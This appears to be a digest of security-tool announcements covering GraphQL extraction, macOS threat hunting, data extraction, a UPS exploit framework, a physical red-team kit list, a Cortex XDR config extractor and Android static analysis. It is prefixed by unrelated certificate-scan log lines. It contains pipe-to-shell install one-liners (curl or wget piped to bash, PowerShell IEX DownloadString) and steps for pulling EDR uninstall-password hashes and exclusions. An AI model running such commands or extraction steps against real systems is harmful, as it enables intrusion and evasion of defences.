datetime="2023-03-06 20:32:01",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:32:02",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subjec t_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha 256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:33:45",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
datetime="2023-03-06 20:33:46",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192. 168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:33:47",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"


Graphicator - A GraphQL Enumeration And Extraction Tool


Graphicator is a GraphQL "scraper" / extractor. The tool iterates over the introspection document returned by the targeted GraphQL endpoint, and then re-structures the schema in an internal form so it can re-create the supported queries. When such queries are created is using them to send requests to the endpoint and saves the returned response to a file.

Erroneous responses are not saved. By default the tool caches the correct responses and also caches the errors, thus when re-running the tool it won't go into the same queries again.

Use it wisely and use it only for targets you have the permission to interact with.

We hope the tool to automate your own tests as a penetration tester and gives some push even to the ones that don't do GraphQLing test yet.

To learn how to perform assessments on GraphQL endpoints: https://cybervelia.com/?p=736&preview=true


Installation

Install on your system

python3 -m pip install -r requirements.txt

Using a container instead

docker run --rm -it -p8005:80 cybervelia/graphicator --target http://the-target:port/graphql --verbose

When the task is done it zips the results and such zip is provided via a webserver served on port 8005. To kill the container, provide CTRL+C. When the container is stopped the data are deleted too. Also you may change the host port according to your needs.

Usage

python3 graphicator.py [args...]

Setting up a target

The first step is to configure the target. To do that you have to provide either a --target option or a file using --file.

Setting a single target via arguments

python3 graphicator.py --target https://subdomain.domain:port/graphql

Setting multiple targets

python3 graphicator.py --target https://subdomain.domain:port/graphql --target https://target2.tld/graphql

Setting targets via a file

python3 graphicator.py --file file.txt

The file should contain one URL per line as such:

http://target1.tld/graphql
http://sub.target2.tld/graphql
http://subxyz.target3.tld:8080/graphql

Using a Proxy

You may connect the tool with any proxy.

Connect to the default burp settings (port 8080)

python3 graphicator.py --target target --default-burp-proxy

Connect to your own proxy

python3 graphicator.py --target target --use-proxy

Connect via Tor

python3 graphicator.py --target target --use-tor

Using Headers

python3 graphicator.py --target target --header "x-api-key:60b725f10c9c85c70d97880dfe8191b3"

Enable Verbose

python3 graphicator.py --target target --verbose

Enable Multi-threading

python3 graphicator.py --target target --multi

Disable warnings for insecure and self-signed certificates

python3 graphicator.py --target target --insecure

Avoid using cached results

python3 graphicator.py --target target --no-cache

Example

python3 graphicator.py --target http://localhost:8000/graphql --verbose --multi

_____ __ _ __
/ ___/____ ___ _ ___ / / (_)____ ___ _ / /_ ___ ____
/ (_ // __// _ `// _ \ / _ \ / // __// _ `// __// _ \ / __/
\___//_/ \_,_// .__//_//_//_/ \__/ \_,_/ \__/ \___//_/
/_/

By @fand0mas

[-] Targets: 1
[-] Headers: 'Content-Type', 'User-Agent'
[-] Verbose
[-] Using cache: True
************************************************************
0%| | 0/1 [00:00<?, ?it/s][*] Enumerating... http://localhost:8000/graphql
[*] Retrieving... => query {getArticles { id,title,views } }
[*] Retrieving... => query {getUsers { id,username,email,password,level } }
100%|█████████████████████████████████████████████| 1/1 [00:00<00:00, 35.78it/s]
$ cat reqcache-queries/9652f1e7c02639d8f78d1c5263093072fb4fd06c.query 
query {getUsers { id,username,email,password,level } }

Output Structure

Three folders are created:

  • reqcache: The response of each valid query is stored in JSON format
  • reqcache-intro: All introspection queries are stored in a separate file in this directory
  • reqcache-queries: All queries are stored in a separate file in this directory. The filename of each query will match with the corresponding filename in the reqcache directory that holds the query's response.

The filename is the hash which takes account the query and the url.

License & EULA

Copyright 2023 Cybervelia Ltd

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Maintainer

The tools has been created and maintained by (@fand0mas).

Contribution is also welcome.



MacOSThreatTrack - Bash Tool Used For Proactive Detection Of Malicious Activity On macOS Systems


The tool is being tested in the beta phase, and it only gathers MacOS system information at this time.

The code is poorly organized and requires significant improvements.

Description

Bash tool used for proactive detection of malicious activity on macOS systems.

I was inspired by Venator-Swift and decided to create a bash version of the tool.

OneLiner command

curl https://raw.githubusercontent.com/ab2pentest/MacOSThreatTrack/main/MacOSThreatTrack.sh | bash

Gathered information

[+] System info
[+] Users list
[+] Environment variables
[+] Process list
[+] Active network connections
[+] SIP status
[+] GateKeeper status
[+] Zsh history
[+] Bash history
[+] Shell startup scripts
[+] PF rules
[+] Periodic scripts
[+] CronJobs list
[+] LaunchDaemons data
[+] Kernel extensions
[+] Installed applications
[+] Installation history
[+] Chrome extensions

Todo

  1. Saving output as JSON instead of printing out the result.


DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


 DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Webiste

Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

Computer Specs

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directorty searching mode
  • Base64 Detection and decoding


Thunderstorm - Modular Framework To Exploit UPS Devices


Thunderstorm is a modular framework to exploit UPS devices.

For now, only the CS-141 and NetMan 204 exploits will be available. The beta version of the framework will be released on the future.


CVE

Thunderstorm is currently capable of exploiting the following CVE:

  • CVE-2022-47186 – Unrestricted file Upload # [CS-141]
  • CVE-2022-47187 – Cross-Site Scripting via File upload # [CS-141]
  • CVE-2022-47188 – Arbitrary local file read via file upload # [CS-141]
  • CVE-2022-47189 – Denial of Service via file upload # [CS-141]
  • CVE-2022-47190 – Remote Code Execution via file upload # [CS-141]
  • CVE-2022-47191 – Privilege Escalation via file upload # [CS-141]
  • CVE-2022-47192 – Admin password reset via file upload # [CS-141]
  • CVE-2022-47891 – Admin password reset # [NetMan 204]
  • CVE-2022-47892 – Sensitive Information Disclosure # [NetMan 204]
  • CVE-2022-47893 – Remote Code Execution via file upload # [NetMan 204]

Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Thunderstorm

Also, you probably need to download the original and the custom firmware. You can download all requirements from here: https://darkbyte.net/links/thunderstorm.php

Usage

- To be disclosed

The detailed guide of use can be found at the following link:

  • To be disclosed

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry

 

***The links of the products may change with time, if so, just ping me on twitter so I can update them. None of the links are affiliated or sponsored. Also, I have personally purchased almost every single item from this list out of my own pocket based on needs for engagements. If there are any other items that are not on this list and you believe they should be, feel free to DM or ping me on twitter (@DavidProbinsky) and I can add them.***


Commonly used tools for Red Teaming Engagements, Physical Security Assessments, and Tactical Covert Entry.

In this list I decided to share most of the tools I utilize in authorized engagements, including where to find some of them, and in some cases I will also include some other alternative tools. I am not providing information on how to use these tools, since this information can be found online with some research. My goal with this list is to help fellow Red Teamers with a 'checklist', for whenever they might be missing a tool, and use this list as a reference for any engagement. Stay safe and legal!!



Recon Tool Where to find Alternative
1. Camera with high zoom Recommended: Panasonic Lumix FZ-80 with 60x Zoom Camera Alternative: If not the Panasonic, you can use others. There are many other good cameras in the market. Try to get one with a decent zoom, any camera with over 30x Optical Zoom should work just fine.
1.1 Polarized Camera Filters Recommended: Any polarized filter that fits the lens of your camera. Alternatives: N/A.
2. Body Worn Action Camera Recommended: GoPro cameras or the DJI Osmo Action cameras Alternatives: There are other cheaper alternative action cameras that can be used, however the videos may not have the highest quality or best image stabilization, which can make the footage seem wobbly or too dark.
3. Drone with Camera Recommended: DJI Mavic Mini Series or any other drone that fits your budget. N/A
4. Two-Way Radios or Walkie Talkies Recommended: BaoFeng UV-5R Alternatives would be to just use cellphones and bluetooth headsets and a live call, however with this option you will not be able to listen to local radio chatter. A cell phone serves the purpose of being able to communicate with the client in case of emergency.
5. Reliable flashlight Amazon, Ebay, local hardware store If you want to save some money, you can always use the flashlight of your cellphone, however some phones cant decrease the brightness intensity.
6. Borescope / Endoscope Recommended: USB Endoscope Camera There are a few other alternatives, varying in price, size, and connectivity.
7. RFID Detector Recommended: One good benefit of the Dangerous Things RFID Diagnostics Card is that its the size of a credit card, so it fits perfectly in your wallet for EDC use. Cheaper Alternative: The RF Detector by ProxGrind can be used as a keychain.
8. Alfa AWUS036ACS 802.11ac Recommended: Alfa AWUS036ACS N/A
9. CANtenna N/A Yagi Antennas also work the same way.



LockPicking & Entry Tools Recommended Alternatives
10. A reliable ScrewDriver with changeable bits Recommended: Wera Kraftform Alternative: Any other screwdriver set will work just fine. Ideally a kit which can be portable and with different bits
11. A reliable plier multitool Recommended: Gerber Plier Multitool Alternatives: any reliable multitool of your preference
12. Gaffer Tape Recommended because of its portability: Red Team Tools Gaffer Tape Alternatives: There are many other options on Amazon, but they are all larger in size.
13. A reliable set of 0.025 thin lockpick set Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments N/A. You do not want a pick breaking inside of a client's lock. Avoid sets that are of unknown brands from ebay.
14. A reliable set of 0.018 thin lockpick set Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments N/A.
15. Tension bars Recommended: Covert Instruments Ergo Turner Set or Sparrows Flatbars There are many other alternatives, varying in sizes and lengths. I strongly recommend having them in varying widths.
16. Warded picks Recommended: Red Team Tools Warded Lock Picks Alternative: Sparrows Warded Pick Set
17. Comb picks Recommended: Covert Instruments Quad Comb Set Alternative options: Sparrows Comb .45 and the Red Team Tools Comb Picks
18. Wafer picks Recommended: Red Team Tools Wafer Picks Alternatives: Sparrows Warded & Wafer Picks with Case
19. Jigglers Recommended: Red Team Tools Jiggler Alternatives: Sparrows Coffin Keys
20. Dimple lockpicks Recommended: Sparrows Black Flag Alternatives: The "Lishi" of Dimple locks Dangerfield Multi-Dimple Lock Picking Tool - 'The Gamechanger'
21. Tubular lockpicks Recommended: Red Team Tools Quick-Connect Tubular Lockpick Alternative: If you are very skilled at picking, you can go the manual route of tensioning and single pin picking, but it will take a lot longer to open the lock. With the Sparrows Goat Wrench you are able to do so.
22. Disk Pick Recommended: Sparrows Disk Pick N/A
23. Lock Lubricant Powdered Graphite found on Ebay or Amazon can get the job done. N/A
24. Plug spinner Recommended: Red Team Tools Peterson Plug Spinner Alternative: LockPickWorld GOSO Pen Style Plug Spinner
25. Hinge Pin Removal Tool Recommended: Red Team Tools Hammerless Hinge Pin Tool Here are some other alternatives: Covert Instruments Hinge Pin Removal Tools
26. PadLock Shims Recommended: Red Team Tools Padlock Shims 5-Pack Alternative: Covert Instruments Padlock Shims 20-pack
27. Combination lock decoders Recommended: Covert Instruments Decoder Bundle Alternative: Sparrows Ultra Decoder
28. Commercial door hook or Adams Rite Recommended: Covert Instruments Commercial Door Hook Alternative: Red Team Tools "Peterson Tools Adams Rite Bypass Wire" or the Sparrows Adams Rite Bypass Driver
29. Lishi Picks IYKYK N/A
30. American Lock Bypass Driver Recommended: Red Team Tools American Lock Padlock Bypass Driver Alternative: Sparrows Padlock Bypass Driver
31. Abus Lock Bypass Driver Recommended: N/A N/A



Bypass Tools Recommended Alternatives
32. Travelers hook Both Red Team Tools Travelers Hook and Covert Instruments Travelers Hook are solid options. N/A
33. Under Door Tool "UDT" Recommended: Sparrows UDT Alternative: Red Team Tools UDT
34. Camera film Recommended: Red Team Tools Film Canister N/A
35. Jim tool Recommended: Sparrows Quick Jim Alternative: Red Team Tools Rescue Jim
36. Crash bar tool "DDT" Recommended: Sparrows DDT Alternative: Serepick DDT
37. Deadbolt Thumb Turn tool Recommended: Both Covert Instruments J tool and Red Team Tools J Tool are solid options N/A
38. Door Latch shims Recommended: Red Team Tools Mica Door Shims Alternative: Covert Instruments Mica Door Shims
39. Strong Magnet Recommended: N/A The MagSwitches. Quick search online and you will find them.
40. Bump Keys Recommended: Sparrows Bump Keys N/A
41. Seattle RAT "SEA-RAT" Recommended: Seattle Rapid Access Tool Alternative: I've heard of the use of piano wire also, but I have not used it myself. IYKYK
42. Air Wedge Recommended: Covert Instruments Air Wedge N/A
43. Can of Compressed Air Recommended: Red Team Tools Air Canister Nozzle Head Cans of compressed air, usually found at your local stores
44. Proxmark3 RDV4 Recommended: Red Team Tools Proxmark RDV4 Alternative: Hacker Warehouse Proxmark3 RDV4
45. General use keys Recommended: Hooligan Keys - Devious, Troublesome, Hooligan! N/A
46. Alarm panels, Cabinets, other keys Recommended: Hooligan Keys Covert Instruments keys
47. Elevator Keys Recommended: Sparrows Fire Service Elevator Key Set N/A



Implants Recommended Alternatives
48. Rubber Ducky or Bash Bunny Recommended: HAK5 USB Rubber Ducky and the HAK5 Bash Bunny Alternatives: The USB Digispark.
49. DigiSpark No recommended links at the moment, but often found on overseas online sellers. Its a cheaper alternative to the Rubber Ducky or the Bash Bunny.Read more.
50. Lan Turtle HAK5 Lan Turtle N/A
51. Shark Jack Recommended: HAK5 Shark Jack N/A
52. Key Croc Recommended: HAK5 Key Croc N/A
53. Wi-Fi Pineapple Recommended: HAK5 WiFi Pineapple N/A
54. O.MG Plug Recommended: HAK5 O.MG Plug N/A
55. ESPKey Recommended: Red Team Tools ESPKey N/A



EDC Tools Recommended Alternatives
56. Pwnagotchi Recommended to build. Pwnagotchi Website. N/A
57. Covert Belt Recommended: Security Travel Money Belt N/A
58. Bogota LockPicks Recommended for EDC: Bogota PI N/A
59. Dog Tag Entry Tool set Recommended: Black Scout Survival Dog Tag N/A
60. Sparrows Wallet EDC Kit Recommended: Sparrows Chaos Card; Sparrows Chaos Card: Wary Edition; Sparrows Shimmy Card; Sparrows Flex Pass; Sparrows Orion Card N/A
61. SouthOrd Jackknife Recommended: SouthOrd Jackknife Alternative: SouthOrd Pocket Pen Pick Set
62. Covert Companion Recommended: Covert Instruments - Covert Companion N/A
63. Covert Companion Turning Tools Recommended: Covert Instruments - Turning Tools N/A



Additional Tools Recommended Alternatives
64. Ladders Easy to carry ladders, for jumping over fences and walls. N/A
65. Gloves Thick comfortable gloves, Amazon has plenty of them. N/A
66. Footwear It varies, depending if social engineering or not. If in the open field, use boots. N/A
67. Attire Dress up depending on the engagement. If in the field, use rugged strong clothes. If in an office building, dress accordingly. N/A
68. Thick wool blanket At least a 5x5 and 1 inch thick, or barbed wires will shred you. N/A
69. First Aid Kit Many kits available on Amazon. N/A



Suppliers or Cool sites to check Website N/A
Sparrows Lock Picks https://www.sparrowslockpicks.com/ N/A
Red Team Tools https://www.redteamtools.com/ N/A
Covert Instruments https://covertinstruments.com/ N/A
Serepick https://www.serepick.com/ N/A
Hooligan Keys https://www.hooligankeys.com N/A
SouthOrd https://www.southord.com/ N/A
Hak5 https://shop.hak5.org/ N/A
Sneak Technology https://sneaktechnology.com/ N/A
Dangerous Things https://dangerousthings.com/ N/A
LockPickWorld https://www.lockpickworld.com/ N/A
TIHK https://tihk.co/ N/A
Lost Art Academy https://lostartacademy.com/ N/A
Toool https://www.toool.us/ N/A
More coming soon! More coming soon! N/A


X-force - IBM Security Utilitary Library In Python. Search And Query All Sources: Threat_Activities And Groups, Malware_Analysis, Industries


IBM Security X-FORCE Exchange library in Python 3. Search: threat_activities, threat_groups, malware_analysis, collector and industries.


Install

pip3 install XForce

Use

Using you API_KEY make a basic authentication. After make a base64 code → Key + : + Password:

printf "d2f5f0f9-2995-42c6-b1dd-4c92252da129:06c41d5e-0604-4c7c-a599-300c367d2090" | base64
# ZDJmNWYwZjktMjk5NS00MmM2LWIxZGQtNGM5MjI1MmRhMTI5OjA2YzQxZDVlLTA2MDQtNGM3Yy1hNTk5LTMwMGMzNjdkMjA5MAo=

Using API_KEY, call functions.

Call functions

Threat activity search return in string XForce.threat_activities(Term, API_KEY) # Malware analysis search return in string XForce.malware_analysis(Term, API_KEY) # Threat groups search return in string XForce.threat_groups(Term, API_KEY) # Industries search return in string XForce.industries(Term, API_KEY) # All categories search return in list with dict XForce.industries(Term, API_KEY)" dir="auto">
import XForce

# Args: 1 - Term of search, 2 - API KEY

# Threat activity search return in string
XForce.threat_activities(Term, API_KEY)

# Malware analysis search return in string
XForce.malware_analysis(Term, API_KEY)

# Threat groups search return in string
XForce.threat_groups(Term, API_KEY)

# Industries search return in string
XForce.industries(Term, API_KEY)

# All categories search return in list with dict
XForce.industries(Term, API_KEY)

For see more details of consult, run:

from XForce import details

# Args: 1 - GUID, 2 - API KEY
# IMPORTANT: all GUID are correspondent to category
# All function of details have:
# url → with x-force exchange panel
details.activity(Id, API_KEY)
details.group(Id, API_KEY)
details.malware(Id, API_KEY)
details.industry(Id, API_KEY)


Cortex-XDR-Config-Extractor - Cortex XDR Config Extractor


This tool is meant to be used during Red Team Assessments and to audit the XDR Settings.

With this tool its possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.


Supported Extractions

  • Uninstall Password Hash & Salt
  • Excluded Signer Names
  • DLL Security Exclusions & Settings
  • PE Security Exclusions & Settings
  • Office Files Security Exclusions & Settings
  • Credential Gathering Module Exclusions
  • Webshell Protection Module Exclusions
  • Childprocess Executionchain Exclusions
  • Behavorial Threat Module Exclusions
  • Local Malware Scan Module Exclusions
  • Memory Protection Module Status
  • Global Hash Exclusions
  • Ransomware Protection Module Modus & Settings

Usage

Usage = ./XDRConfExtractor.py [Filename].ldb
Help = ./XDRConfExtractor.py -h

Getting Hold of Database Lock Files

Agent Version <7.8

With Agent Versions prior to 7.8 any authenticated user can generate a Support File on Windows via Cortex XDR Console in the System Tray. The databse lock files can be found within the zip:

logs_[ID].zip\Persistence\agent_settings.db\

Agent Version ≥7.8

Support files from Agents running Version 7.8 or higher are encrypted, but if you have elevated privileges on the Windows Maschine the files can be directly copied from the following directory, without encryption.

Method I

C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db\

Method II

Generated Support Files are not deleted regulary, so it might be possible to find old, unencrypted Support Files in the following folder:

C:\Users\[Username]\AppData\Roaming\PaloAltoNetworks\Traps\support\

Agent Version >8.1

Supposedly, since Agent version 8.1, it should no longer be possible to pull the data from the lock files. This has not been tested yet.

Credits

This tool relies on a technique originally released by mr.d0x in April 2022 https://mrd0x.com/cortex-xdr-analysis-and-bypass/

Legal disclaimer

Usage of Cortex-XDR-Config-Extractor for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.



APKHunt - Comprehensive Static Code Analysis Tool For Android Apps That Is Based On The OWASP MASVS Framework


APKHunt is a comprehensive static code analysis tool for Android apps that is based on the OWASP MASVS framework. Although APKHunt is intended primarily for mobile app developers and security testers, it can be used by anyone to identify and address potential security vulnerabilities in their code.

With APKHunt, mobile software architects or developers can conduct thorough code reviews to ensure the security and integrity of their mobile applications, while security testers can use the tool to confirm the completeness and consistency of their test results. Whether you're a developer looking to build secure apps or an infosec tester charged with ensuring their security, APKHunt can be an invaluable resource for your work.

Features

  • Scan coverage: Covers most of the SAST (Static Application Security Testing) related test cases of the OWASP MASVS framework.
  • Multiple APK scanning: Supports scanning multiple APK files in a perticular path or folder.
  • Optimised scanning: Specific rules are designed to check for particular security sinks, resulting in an almost accurate scanning process.
  • Low false-positive rate: Designed to pinpoint and highlight the exact location of potential vulnerabilities in the source code.
  • Output format: Results are provided in a TXT file format for easy readability for end-users.

Installation

  1. git clone https://github.com/Cyber-Buddy/APKHunt.git
  2. cd apkhunt
  3. go run apkhunt.go

Requirements:

  • Install Git: sudo apt-get install git
  • Install Golang: sudo apt install golang-go
  • Install JADX: sudo apt-get install jadx
  • Install Dex2jar: sudo apt-get install dex2jar

Limitation:

  • Only supported on Linux environments

Usage

      _ _   __ __  _   __  _   _                _   
/ _ \ | _ _ \| | / / | | | | | |
/ /_\ \| |_/ /| |/ / | |_| | _ _ _ _ | |_
| _ || __/ | \ | _ || | | |/ _ \| _|
| | | || | | |\ \ | | | || |_| || | | || |_
\_| |_/\_| \_| \_/ \_| |_/\ _ _ /|_| |_|\_ _|
------------------------------------------------
OWASP MASVS Static Analyzer

APKHunt Usage:
go run APKHunt.go [options] {.apk file}

Options:
-h For help
-p Provide the apk file-path
-m Provide the folder-path for multiple apk scanning
-l For logging (.txt file)

Examples:
APKHunt.go -p /Downloads/android_app.apk
APKHunt.go -p /Downloads/android_app.apk -l
APKHunt.go -m /Downloads/android_apps/
APKHunt.go -m /Downloads/android_apps/ -l

Security test-case coverage

The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.

OWASP MASVS
V1 Architecture, Design and Threat Modeling Requirements
V2 Data Storage and Privacy Requirements
V3 Cryptography Requirements
V4 Authentication and Session Management Requirements
V5 Network Communication Requirements
V6 Environmental Interaction Requirements
V7 Code Quality and Build Setting Requirements
V8 Resiliency & Reverse Engineering Requirements

Upcoming Features

  • Scanning of multiple APK files - DONE
  • More output format such as HTML - In the outer orbit!
  • Integration with third-party tools - Cannot commit!

Contribution

We would love to receive any sort of contribution from the community. Please provide your valuable suggestions or feedback to make this tool even more awesome.

Disclaimer

This project is created to help the infosec community. It is important to respect its core philosophy, values, and intentions. Please refrain from using it for any harmful, malicious, or evil purposes.

License

This project is licensed under the GNU General Public License v3.0

Project Developer

Credits



IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


IpGeo is a python tool to extract IP addresses from captured network traffic file (pcap/pcapng) and generate csv report containing details about the geolocation of each ip in the packets.


The report contains:

  1. Country:
  2. Country Code.
  3. Region
  4. Region Name
  5. City
  6. Zip
  7. Latitude
  8. Longitude
  9. Timezone
  10. Isp
  11. Org
  12. Ip

Installation

Use the package manager pip3 to install required modules.

pip3 install colorama
pip3 install requests
pip3 install pyshark

If you are not using Kali or ParrotOs or any other penetration distribution you need to install Tshark.

sudo apt install tshark

Usage

python3 ipGeo.py
# then you will enter captured traffic file path


SXDork - A Powerful Tool That Utilizes The Technique Of Google Dorking To Search For Specific Information On The Internet


